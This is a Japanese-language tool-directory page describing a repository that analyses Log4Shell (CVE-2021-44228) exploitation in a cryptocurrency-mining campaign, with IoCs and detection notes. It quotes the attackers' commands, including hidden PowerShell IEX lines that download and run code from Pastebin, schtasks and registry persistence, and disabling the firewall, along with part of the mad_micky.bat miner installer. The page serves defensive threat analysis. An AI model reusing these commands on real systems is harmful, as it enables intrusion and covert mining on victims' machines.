Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4j-Vulnerability — Log4Shell(CVE-2021-44228)脆弱性の教育的分析。暗号通貨マイニングキャンペーンでの悪用の詳細、IoC、MITRE ATT&CKマッピング、検出ガイダンスが含まれます。 | Kitploit
ツール/GitHubGitHub/demining/log4j-vulnerability
侵害指標 (IOC) 管理脆弱性分析エクスプロイトマルウェア分析脅威インテリジェンス学習と教育
GitHubdemining/log4j-vulnerability

Log4j-Vulnerability

Log4Shell(CVE-2021-44228)脆弱性の教育的分析。暗号通貨マイニングキャンペーンでの悪用の詳細、IoC、MITRE ATT&CKマッピング、検出ガイダンスが含まれます。

リポジトリを見る
62543年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ウェブサイト

Log4j 脆弱性



Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability
  • チュートリアル: https://youtu.be/PNDBjoT83zA
  • チュートリアル: https://cryptodeeptech.ru/log4j-vulnerability


Log4j の背景

アリババクラウドセキュリティチームは、Apache Log4j2 (Log4Shell) の複数のバージョンに対して、認証されていないリモートコード実行を可能にする重大な脆弱性 (CVE-2021-44228) を公開しました。脆弱なサーバーは、HTTPS などの任意のプロトコルを介して接続し、特別に細工された文字列を送信する攻撃者によって悪用される可能性があります。

Log4j 暗号通貨マイニングキャンペーン

Darktrace は、この Log4j の脆弱性を悪用した結果発生した、複数の顧客環境における暗号通貨マイニングを検出しました。これらの各インシデントでは、悪用は、境界防御をバイパスし、バッチ (.bat) スクリプトファイルや、暗号通貨マイニングマルウェアをインストールする複数の実行ファイルをダウンロードするための base64 エンコードされた PowerShell スクリプトへのリクエストと思われる、送信 SSL 接続を介して発生しました。このアクティビティには、共通のハードコードされた IP アドレス、実行ファイル、スクリプトなど、より広範なキャンペーンを示す指標がありました。

攻撃サイクルは、Log4j エクスプロイトに対して脆弱な VMWare Horizons サーバーを探す、インターネット接続デバイスの日和見的なスキャンと思われるものから始まります。脆弱なサーバーが見つかると、攻撃者は被害者に対して HTTP および SSL 接続を行います。悪用に成功した後、サーバーはポート 1389 でコールバックを実行し、mad_micky.bat という名前のスクリプトを取得します。これにより、以下のことが達成されます。

  • すべてのプロファイルを state=off に設定して Windows ファイアウォールを無効にする
    ‘netsh advfirewall set allprofiles state off’
  • ‘netstat -ano | findstr TCP’ を使用して、他のマイナーインストールを示す既存のプロセスを検索し、ポート :3333、:4444、:5555、:7777、:9000 で動作しているプロセスを特定し、実行中のプロセスを停止する
  • 新しい WebClient が開始され、wxm.exe をサイレントにダウンロードする
  • スケジュールされたタスクを使用して永続性を作成する。コマンド ‘schtasks /create /F /sc minute /mo 1 /tn –‘ はタスクをスケジュールし、警告を抑制する。タスクはコマンドから 1 分以内にスケジュールされ、名前 ‘BrowserUpdate’ が与えられ、悪意のあるドメイン ‘b.oracleservice[.]top’ およびハードコードされた IP アドレス (198.23.214[.]117:8080 -o 51.79.175[.]139:8080 -o 167.114.114[.]169:8080) を指す
  • レジストリキーが RunOnce に追加され、永続性を確保する: reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Run2 /d

少なくとも 2 つのケースでは、mad_micky.bat スクリプトは、ユーザーエージェント Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; Win64; x64; Trident/6.0; MAARJS) を持つ HTTP 接続で取得されました。これは、これらのネットワークでこのユーザーエージェントが確認された最初で唯一のケースでした。このユーザーエージェントは、工場出荷時インストール状態の一部の ASUS デバイスで正規に使用されているようです。ただし、このアクティビティ中にのみ見られた新しいユーザーエージェントであるため、不審です。

悪用に成功した後、サーバーはポート 1389 でコールバックを実行し、スクリプトファイルを取得します。この例では、/xms.ps1 は、ホスト上の実行ポリシーをバイパスして ‘mad_micky.bat’ を呼び出す base64 エンコードされた PowerShell スクリプトです。

Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability

図 1: PowerShell スクリプト xms.ps1 に関する追加情報

スナップショットは、影響を受けたサーバーのイベントログの詳細を示し、mad_micky.bat ファイルのダウンロードにつながった Log4j RCE の成功を示しています。

Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability

図 2: mad_micky.bat ファイルを強調したログデータ

実行ファイルとスクリプトを取得するために、追加の接続が開始されました。スクリプトには、韓国とウクライナにある 2 つの IP アドレスが含まれていました。マイナーを起動する実行ファイル xm.exe をダウンロードするために、ウクライナの IP への接続が行われました。マイナー (この場合は XMRig Miner) は、複数の公開場所からダウンロード可能なオープンソースのクロスプラットフォームマイニングツールです。次に確認された exe のダウンロードは ‘wxm.exe’ (f0cf1d3d9ed23166ff6c1f3deece19b4) でした。

Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability

図 3: XMRig 実行ファイルに関する追加情報

韓国の IP への接続には、別のスクリプト (/2.ps1) と実行ファイル (LogBack.exe) のリクエストが含まれていました。このスクリプトは、SCM イベントログフィルターや PowerShell イベントログコンシューマーなど、ログに関連する実行中のタスクを削除します。また、スクリプトは Pastebin からファイルをリクエストします。これはおそらく Cobalt Strike ビーコン設定ファイルです。ログの削除は、スケジュールされたタスクと WMI を介して実行され、含まれるもの: Eventlogger、SCM Event Log Filter、DSM Event Log Consumer、PowerShell Event Log Consumer、Windows Events Consumer、BVTConsumer。

  • 設定ファイル (ホストされていません): IEX (New-Object System.Net.Webclient) DownloadString(‘hxxps://pastebin.com/raw/g93wWHkR’)

Pastebin からリクエストされた 2 番目のファイル (現在は Pastebin でホストされていません) は、schtasks コマンドの一部であり、永続性を確立するために使用された可能性があります。

  • schtasks /create /sc MINUTE /mo 5 /tn “\Microsoft\windows\.NET Framework\.NET Framework NGEN v4.0.30319 32” /tr “c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c ‘IEX ((new-object net.webclient).downloadstring(”hxxps://pastebin.com/raw/bcFqDdXx”’))'” /F /ru System

実行ファイル Logback.exe は別の XMRig マイニングツールです。config.json ファイルも同じ韓国の IP からダウンロードされました。その後、cmd.exe と wmic コマンドがマイナーの設定に使用されました。

これらのファイルのダウンロードとマイナーの設定の後、Pastebin への追加の接続が行われました。

Exploit in the cryptocurrency mining code that used a dangerous Log4j vulnerability

図 4: mad_micky.bat ファイルの OSINT 関連付け


プロセスの詳細 — mad_micky.bat ファイル

インストール

set “STARTUP_DIR=%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup”
set “STARTUP_DIR=%USERPROFILE%\Start Menu\Programs\Startup”

looking for the following utilities: powershell, find, findstr, tasklist, sc
set “LOGFILE=%USERPROFILE%\mimu6\xmrig.log”
if %EXP_MONER_HASHRATE% gtr 8192 ( set PORT=18192 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4096 ( set PORT=14906 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2048 ( set PORT=12048 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 1024 ( set PORT=11024 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 512 ( set PORT=10512 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 256 ( set PORT=10256 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 128 ( set PORT=10128 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 64 ( set PORT=10064 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 32 ( set PORT=10032 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 16 ( set PORT=10016 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 8 ( set PORT=10008 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 4 ( set PORT=10004 & goto PORT_OK)
if %EXP_MONER_HASHRATE% gtr 2 ( set PORT=10002 & goto PORT_OK)
set port=10001

マイナーの準備

echo [*] Removing previous mimu miner (if any)
sc stop gado_miner
sc delete gado_miner
taskkill /f /t /im xmrig.exe
taskkill /f /t/im logback.exe
taskkill /f /t /im network02.exe
:REMOVE_DIR0
echo [*] Removing “%USERPROFILE%\mimu6” directory
timeout 5
rmdir /q /s “USERPROFILE%\mimu6” >NUL 2>NUL
IF EXIST “%USERPROFILE%\mimu6” GOTO REMOVE_DIR0

XMRIG のダウンロード

ツールをダウンロード